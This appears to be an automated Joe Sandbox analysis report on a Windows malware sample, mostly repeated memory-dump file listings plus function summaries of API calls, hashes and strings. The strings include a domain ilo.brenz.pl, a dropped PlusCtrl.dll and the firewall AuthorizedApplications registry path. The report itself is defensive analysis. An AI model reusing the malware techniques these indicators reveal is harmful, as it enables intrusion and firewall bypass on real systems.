Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: LibraryLoadSleepVersionlstrlen
String ID: ilo.brenz.pl
API String ID: 3609553399-878173267
Opcode ID: 174516e84d9c669cdc790a5bd5a266766651d9cd51a165662f06c8ce5e18c4ab
Instruction ID: cc84fb61209408f574a2dd9875626c80196d9c769dfaae8b703c4eca60857b41
Opcode Fuzzy Hash: 174516e84d9c669cdc790a5bd5a266766651d9cd51a165662f06c8ce5e18c4ab
Instruction Fuzzy Hash: 2E614732614205BFDB61EF24C819BDE3F6DAF41301F04085AE8699E081D7F89F09C7AA

Function 00401CB5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110libraryfileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00401C02
CloseHandle.KERNEL32(?), ref: 00401C3F
LoadLibraryA.KERNEL32(PlusCtrl.dll), ref: 00401C52
CreateFileA.KERNEL32(PlusCtrl.dll,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00401CF9
CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00401D37

Strings

PlusCtrl.dll, xrefs: 00401C45, 00401CF4

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CloseHandle$CreateFileLibraryLoad
String ID: PlusCtrl.dll
API String ID: 4073770061-3813448905
Opcode ID: c6c2baf483a5c7817c0615bf604dfdbf5b4d22fa498cde7f9790926ec1ef48c2
Instruction ID: da15035d668b36466e8179076398aeffbcb361aec3f94f14ce4845e29cafbb59
Opcode Fuzzy Hash: c6c2baf483a5c7817c0615bf604dfdbf5b4d22fa498cde7f9790926ec1ef48c2
Instruction Fuzzy Hash: 214171715443019BE720CF34DD44B2BBBE4AB84764F140A2EF9A1B63F0E778D9458B9A

Function 0047FFD7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 98sleeplibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,0047FFCB), ref: 0047FFD8
GetModuleFileNameA.KERNEL32(00000000,00482C2E,000000C8), ref: 0047FFED
CreateThread.KERNEL32(00000000,00000000,0047F985,00000000,00000000), ref: 0048004B
CloseHandle.KERNEL32(?,0C1A4F68), ref: 00480054
Sleep.KERNEL32(00001388,00000000,00000000), ref: 004800FB

Part of subcall function 0047F6F9: NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 0047F73E
Part of subcall function 0047F6F9: NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 0047F75D
Part of subcall function 0047F6F9: MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 0047F787
Part of subcall function 0047F6F9: CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 0047F794
Part of subcall function 0047F6F9: UnmapViewOfFile.KERNEL32(?), ref: 0047F7AC

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00480017

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: File$CloseHandleView$AddressCreateInformationModuleNameOpenProcQuerySectionSleepSystemThreadUnmap
String ID: SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3454824499-621207024
Opcode ID: 5a2e8885b122901e0e527b3c98aa0eb90efe88ce56f4889f66029a75c3141c74
Instruction ID: babc94883a302b9edaef80eb811b418dc2df77098cc16885f94b522768664b27
Opcode Fuzzy Hash: 5a2e8885b122901e0e527b3c98aa0eb90efe88ce56f4889f66029a75c3141c74
Instruction Fuzzy Hash: 3B318F31510605BBDB71AB65DC0EFEF362CDF42701F00451AF9196A080DAF45F0986AA

Function 00403E89 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 91sleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 00403F9E
ExitThread.KERNEL32 ref: 00403FAB

Strings

8@, xrefs: 00403EB7
L8@, xrefs: 00403EDE
:8@, xrefs: 00403F00
(8@, xrefs: 00403F10

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: ExitSleepThread
String ID: (8@$:8@$L8@$8@
API String ID: 2532117645-3614555925
Opcode ID: 03f13d39a4d50158b3b0a3e900b25450fd1bb83df8e0ac367b200edcad169de3
Instruction ID: 45af933c2d0913eb26ad9620014091e4a7ed23ef7f5d571b2848da93812ef47f
Opcode Fuzzy Hash: 03f13d39a4d50158b3b0a3e900b25450fd1bb83df8e0ac367b200edcad169de3
Instruction Fuzzy Hash: EE310231604300ABD310AF24ED45BAFB7A8EF95311F00443DF689A72C1CA7499098B9A

Function 004027E2 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 49sleepsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00402500: EnumResourceNamesA.KERNEL32(00000000,0000000A,Function_00002430,00000000), ref: 0040250B

Part of subcall function 00402520: lstrcpyA.KERNEL32(?,SYSTEM\CurrentControlSet\Services\), ref: 00402533
Part of subcall function 00402520: lstrcatA.KERNEL32(?,100200), ref: 00402543

Part of subcall function 00401980: LoadLibraryA.KERNEL32 ref: 004019A0

Part of subcall function 004012B0: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004012C2

WaitForSingleObject.KERNEL32(00000000,000000FF,Function_000019C0,00000000), ref: 00402864
CloseHandle.KERNEL32(?), ref: 0040286D
Sleep.KERNEL32(0000012C), ref: 00402887

Strings

<6@, xrefs: 004027F7
8@, xrefs: 00402838
hra%u.dll, xrefs: 004027F1

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CloseCreateEnumHandleLibraryLoadNamesObjectResourceSingleSleepThreadWaitlstrcatlstrcpy
String ID: <6@$hra%u.dll$8@
API String ID: 3019664125-4073101535
Opcode ID: b727a94cfc5c1870f1e87c0db4c5fd5ae21f5c357b8a6d8ebe3cffbda59e6732
Instruction ID: b4c6470f87cb35eaba9384fad452608e987ecd5d27c4b6046072c90e75b6b2b8
Opcode Fuzzy Hash: b727a94cfc5c1870f1e87c0db4c5fd5ae21f5c357b8a6d8ebe3cffbda59e6732
Instruction Fuzzy Hash: B701D275240300ABD200BB70EE8AFAAB364AB48710F10063EFA51721E2DEF994018B6D

Function 0047FFC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0047FFB4), ref: 0047FFC0

Part of subcall function 0047FFD7: GetProcAddress.KERNEL32(00000000,0047FFCB), ref: 0047FFD8
Part of subcall function 0047FFD7: GetModuleFileNameA.KERNEL32(00000000,00482C2E,000000C8), ref: 0047FFED
Part of subcall function 0047FFD7: CreateThread.KERNEL32(00000000,00000000,0047F985,00000000,00000000), ref: 0048004B
Part of subcall function 0047FFD7: CloseHandle.KERNEL32(?,0C1A4F68), ref: 00480054
Part of subcall function 0047FFD7: Sleep.KERNEL32(00001388,00000000,00000000), ref: 004800FB

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00480017

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
